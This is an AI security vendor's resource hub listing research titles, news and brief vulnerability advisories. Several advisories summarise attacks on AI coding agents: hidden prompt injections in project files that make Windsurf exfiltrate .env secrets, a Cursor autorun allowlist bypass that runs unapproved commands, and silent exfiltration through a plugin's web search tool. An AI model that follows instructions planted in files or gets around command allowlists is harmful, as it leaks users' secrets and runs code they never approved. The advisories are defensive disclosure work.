Innovation Hub

Featured Posts

Insights
xx
min read

Introducing Workflow-Aligned Modules in the HiddenLayer AI Security Platform

Insights
xx
min read

Inside HiddenLayer’s Research Team: The Experts Securing the Future of AI

Insights
xx
min read

Why Traditional Cybersecurity Won’t “Fix” AI

Get all our Latest Research & Insights

Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.

Research

Research
xx
min read

Agentic ShadowLogic

Research
xx
min read

MCP and the Shift to AI Systems

Research
xx
min read

The Lethal Trifecta and How to Defend Against It

Research
xx
min read

EchoGram: The Hidden Vulnerability Undermining AI Guardrails

Videos

Report and Guides

Report and Guide
xx
min read

Securing AI: The Technology Playbook

Report and Guide
xx
min read

Securing AI: The Financial Services Playbook

Report and Guide
xx
min read

AI Threat Landscape Report 2025

HiddenLayer AI Security Research Advisory

CVE-2025-62354
XX
min read

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

When in autorun mode with the secure ‘Follow Allowlist’ setting, Cursor checks commands sent to run in the terminal by the agent to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic, allowing an attacker to craft a command that will execute non-whitelisted commands.

SAI-ADV-2025-012
XX
min read

Data Exfiltration from Tool-Assisted Setup

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. This means an attacker can hide instructions within a project file to read and extract sensitive data from project files (such as a .env file) and insert it into web requests for the purposes of exfiltration.

CVE-2025-62353
XX
min read

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.

CVE-2025-62356
XX
min read

Symlink Bypass in File System MCP Server Leading to Arbitrary Filesystem Read

A symlink bypass vulnerability exists inside of the built-in File System MCP server, allowing any file on the filesystem to be read by the model. The code that validates allowed paths can be found in the file: ai/codium/mcp/ideTools/FileSystem.java, but this validation can be bypassed if a symbolic link exists within the project.

In the News

News
XX
min read
HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

Underpinning HiddenLayer’s unique solution for the DoD and USIC is HiddenLayer’s Airgapped AI Security Platform, the first solution designed to protect AI models and development processes in fully classified, disconnected environments. Deployed locally within customer-controlled environments, the platform supports strict US Federal security requirements while delivering enterprise-ready detection, scanning, and response capabilities essential for national security missions.

News
XX
min read
HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

As organizations rapidly adopt generative AI, they face increasing risks of prompt injection, data leakage, and model misuse. HiddenLayer’s security technology, built on AWS, helps enterprises address these risks while maintaining speed and innovation.

News
XX
min read
HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

On September 30, Databricks officially launched its <a href="https://www.databricks.com/blog/transforming-cybersecurity-data-intelligence?utm_source=linkedin&amp;utm_medium=organic-social">Data Intelligence Platform for Cybersecurity</a>, marking a significant step in unifying data, AI, and security under one roof. At HiddenLayer, we’re proud to be part of this new data intelligence platform, as it represents a significant milestone in the industry's direction.

Insights
xx
min read

AI Security: 2025 Predictions Recommendations

It’s time to dust off the crystal ball once again! Over the past year, AI has truly been at the forefront of cyber security, with increased scrutiny from attackers, defenders, developers, and academia. As various forms of generative AI drive mass AI adoption, we find that the threats are not lagging far behind, with LLMs, RAGs, Agentic AI, integrations, and plugins being a hot topic for researchers and miscreants alike.

Insights
xx
min read

Securely Introducing Open Source Models into Your Organization

Open source models are powerful tools for data scientists, but they also come with risks. If your team downloads models from sources like Hugging Face without security checks, you could introduce security threats into your organization. You can eliminate this risk by introducing a process that scans models for vulnerabilities before they enter your organization and are utilized by data scientists. You can ensure that only safe models are used by leveraging HiddenLayer's Model Scanner combined with your CI/CD platform. In this blog, we'll walk you through how to set up a system where data scientists request models, security checks run automatically, and approved models are stored in a safe location like cloud storage, a model registry, or Databricks Unity Catalog.

Insights
xx
min read

Enhancing AI Security with HiddenLayer’s Refusal Detection

Security risks in AI applications are not one-size-fits-all. A system processing sensitive customer data presents vastly different security challenges compared to one that aggregates internet data for market analysis. To effectively safeguard an AI application, developers and security professionals must implement comprehensive mechanisms that instruct models to decline contextually malicious requests—such as revealing personally identifiable information (PII) or ingesting data from untrusted sources. Monitoring these refusals provides an early and high-accuracy warning system for potential malicious behavior.

Insights
xx
min read

Why Revoking Biden’s AI Executive Order Won’t Change Course for CISOs

On 20 January 2025, President Donald Trump rescinded former President Joe Biden’s 2023 executive order on artificial intelligence (AI), which had established comprehensive guidelines for developing and deploying AI technologies. While this action signals a shift in federal policy, its immediate impact on the AI landscape is minimal for several reasons.

Insights
xx
min read

HiddenLayer Achieves ISO 27001 and Renews SOC 2 Type 2 Compliance

Security compliance is more than just a checkbox - it’s a fundamental requirement for protecting sensitive data, building customer trust, and ensuring long-term business growth. At HiddenLayer, security has always been at the core of our mission, and we’re proud to announce that we have achieved SOC 2 Type 2 and ISO 27001 compliance. These certifications reinforce our commitment to providing our customers with the highest level of security and reliability.

Insights
xx
min read

AI Risk Management: Effective Strategies and Framework

Artificial Intelligence (AI) is no longer just a buzzword—it’s a cornerstone of innovation across industries. However, with great potential comes significant risk. Effective AI Risk Management is critical to harnessing AI’s benefits while minimizing vulnerabilities. From data breaches to adversarial attacks, understanding and mitigating risks ensures that AI systems remain trustworthy, secure, and aligned with organizational goals.

Insights
xx
min read

Security for AI vs. AI Security

When we talk about securing AI, it’s important to distinguish between two concepts that are often conflated: Security for AI and AI Security. While they may sound similar, they address two entirely different challenges.

Insights
xx
min read

The Next Step in AI Red Teaming, Automation

Red teaming is essential in security, actively probing defenses, identifying weaknesses, and assessing system resilience under simulated attacks. For organizations that manage critical infrastructure, every vulnerability poses a risk to data, services, and trust. As systems grow more complex and threats become more sophisticated, traditional red teaming encounters limits, particularly around scale and speed. To address these challenges, we built the next step in red teaming: an <a href="https://hiddenlayer.com/autortai/"><strong>Automated Red Teaming for AI solution</strong><strong> </strong>that combines intelligence and efficiency to achieve a level of depth and scalability beyond what human-led efforts alone can offer.

Insights
xx
min read

Understanding AI Data Poisoning

Today, AI is woven into everyday technology, driving everything from personalized recommendations to critical healthcare diagnostics. But what happens if the data feeding these AI models is tampered with? This is the risk posed by AI data poisoning—a targeted attack where someone intentionally manipulates training data to disrupt how AI systems operate. Far from science fiction, AI data poisoning is a growing digital security threat that can have real-world impacts on everything from personal safety to financial stability.

Insights
xx
min read

The EU AI Act: A Groundbreaking Framework for AI Regulation

Artificial intelligence (AI) has become a central part of our digital society, influencing everything from healthcare to transportation, finance, and beyond. The European Union (EU) has recognized the need to regulate AI technologies to protect citizens, foster innovation, and ensure that AI systems align with European values of privacy, safety, and accountability. In this context, the EU AI Act is the world’s first comprehensive legal framework for AI. The legislation aims to create an ecosystem of trust in AI while balancing the risks and opportunities associated with its development.

Insights
xx
min read

Key Takeaways from NIST's Recent Guidance

On July 29th, 2024, the National Institute of Standards and Technology (NIST) released critical guidance that outlines best practices for managing cybersecurity risks associated with AI models. This guidance directly ties into several comments we submitted during the open comment periods, highlighting areas where HiddenLayer effectively addresses emerging cybersecurity challenges.

Insights
xx
min read

Three Distinct Categories Of AI Red Teaming

As we’ve covered previously, AI red teaming is a highly effective means of assessing and improving the security of AI systems. The term “red teaming” appears many times throughout recent public policy briefings regarding AI.

research
xx
min read

Agentic ShadowLogic

research
xx
min read

MCP and the Shift to AI Systems

research
xx
min read

The Lethal Trifecta and How to Defend Against It

research
xx
min read

EchoGram: The Hidden Vulnerability Undermining AI Guardrails

research
xx
min read

Same Model, Different Hat

research
xx
min read

The Expanding AI Cyber Risk Landscape

research
xx
min read

The First AI-Powered Cyber Attack

research
xx
min read

Prompts Gone Viral: Practical Code Assistant AI Viruses

research
xx
min read

Persistent Backdoors

research
xx
min read

Visual Input based Steering for Output Redirection (VISOR)

research
xx
min read

How Hidden Prompt Injections Can Hijack AI Code Assistants Like Cursor

research
xx
min read

Introducing a Taxonomy of Adversarial Prompt Engineering

Report and Guide
xx
min read

Securing AI: The Technology Playbook

Report and Guide
xx
min read

Securing AI: The Financial Services Playbook

Report and Guide
xx
min read

AI Threat Landscape Report 2025

Report and Guide
xx
min read

HiddenLayer Named a Cool Vendor in AI Security

Report and Guide
xx
min read

A Step-By-Step Guide for CISOS

Report and Guide
xx
min read

AI Threat landscape Report 2024

Report and Guide
xx
min read

HiddenLayer and Intel eBook

Report and Guide
xx
min read

Forrester Opportunity Snapshot

news
xx
min read

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

news
xx
min read

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

news
xx
min read

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

news
xx
min read

HiddenLayer Appoints Chelsea Strong as Chief Revenue Officer to Accelerate Global Growth and Customer Expansion

news
xx
min read

HiddenLayer Listed in AWS “ICMP” for the US Federal Government

news
xx
min read

New TokenBreak Attack Bypasses AI Moderation with Single-Character Text Changes

news
xx
min read

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

news
xx
min read

All Major Gen-AI Models Vulnerable to ‘Policy Puppetry’ Prompt Injection Attack

news
xx
min read

One Prompt Can Bypass Every Major LLM’s Safeguards

news
xx
min read

Cyera and HiddenLayer Announce Strategic Partnership to Deliver End-to-End AI Security

news
xx
min read

HiddenLayer Unveils AISec Platform 2.0 to Deliver Unmatched Context, Visibility, and Observability for Enterprise AI Security

news
xx
min read

HiddenLayer AI Threat Landscape Report Reveals AI Breaches on the Rise;

SAI Security Advisory

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

When in autorun mode with the secure ‘Follow Allowlist’ setting, Cursor checks commands sent to run in the terminal by the agent to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic, allowing an attacker to craft a command that will execute non-whitelisted commands.

SAI Security Advisory

Data Exfiltration from Tool-Assisted Setup

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. This means an attacker can hide instructions within a project file to read and extract sensitive data from project files (such as a .env file) and insert it into web requests for the purposes of exfiltration.

SAI Security Advisory

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.

SAI Security Advisory

Symlink Bypass in File System MCP Server Leading to Arbitrary Filesystem Read

A symlink bypass vulnerability exists inside of the built-in File System MCP server, allowing any file on the filesystem to be read by the model. The code that validates allowed paths can be found in the file: ai/codium/mcp/ideTools/FileSystem.java, but this validation can be bypassed if a symbolic link exists within the project.

SAI Security Advisory

Data Exfiltration through Web Search Tool

The Web Search functionality within the Qodo Gen JetBrains plugin is set up as a built-in MCP server through ai/codium/CustomAgentKt.java. It does not ask user permission when called, meaning that an attacker can enumerate code project files on a victim’s machine and call the Web Search tool to exfiltrate their contents via a request to an external server.

SAI Security Advisory

Unsafe deserialization function leads to code execution when loading a Keras model

An arbitrary code execution vulnerability exists in the TorchModuleWrapper class due to its usage of torch.load() within the from_config method. The method deserializes model data with the weights_only parameter set to False, which causes Torch to fall back on Python’s pickle module for deserialization. Since pickle is known to be unsafe and capable of executing arbitrary code during the deserialization process, a maliciously crafted model file could allow an attacker to execute arbitrary commands.

SAI Security Advisory

How Hidden Prompt Injections Can Hijack AI Code Assistants Like Cursor

When in autorun mode, Cursor checks commands against those that have been specifically blocked or allowed. The function that performs this check has a bypass in its logic that can be exploited by an attacker to craft a command that will be executed regardless of whether or not it is on the block-list or allow-list.

SAI Security Advisory

Exposure of sensitive Information allows account takeover

By default, BackendAI’s agent will write to /home/config/ when starting an interactive session. These files are readable by the default user. However, they contain sensitive information such as the user’s mail, access key, and session settings. A threat actor accessing that file can perform operations on behalf of the user, potentially granting the threat actor super administrator privileges.

SAI Security Advisory

Improper access control arbitrary allows account creation

By default, BackendAI doesn’t enable account creation. However, an exposed endpoint allows anyone to sign up with a user-privileged account. This flaw allows threat actors to initiate their own unauthorized session and exploit the resources—to install cryptominers, use the session as a malware distribution endpoint—or to access exposed data through user-accessible storages.

SAI Security Advisory

Missing Authorization for Interactive Sessions

BackendAI interactive sessions do not verify whether a user is authorized and doesn’t have authentication. These missing verifications allow attackers to take over the sessions and access the data (models, code, etc.), alter the data or results, and stop the user from accessing their session.

SAI Security Advisory

Unsafe Deserialization in DeepSpeed utility function when loading the model file

The convert_zero_checkpoint_to_fp32_state_dict utility function contains an unsafe torch.load which will execute arbitrary code on a user’s system when loading a maliciously crafted file.

SAI Security Advisory

keras.models.load_model when scanning .pb files leads to arbitrary code execution

A vulnerability exists inside the unsafe_check_pb function within the watchtower/src/utils/model_inspector_util.py file. This function runs keras.models.load_model on a .pb file that the user wants to scan for malicious payloads. A maliciously crafted .pb file will execute its payload when run with keras.models.load_model, allowing for a user’s device to be compromised when scanning a downloaded file.

Stay Ahead of AI Security Risks

Get research-driven insights, emerging threat analysis, and practical guidance on securing AI systems—delivered to your inbox.

By submitting this form, you agree to HiddenLayer's Terms of Use and acknowledge our Privacy Statement.

Thanks for your message!

We will reach back to you as soon as possible.

Oops! Something went wrong while submitting the form.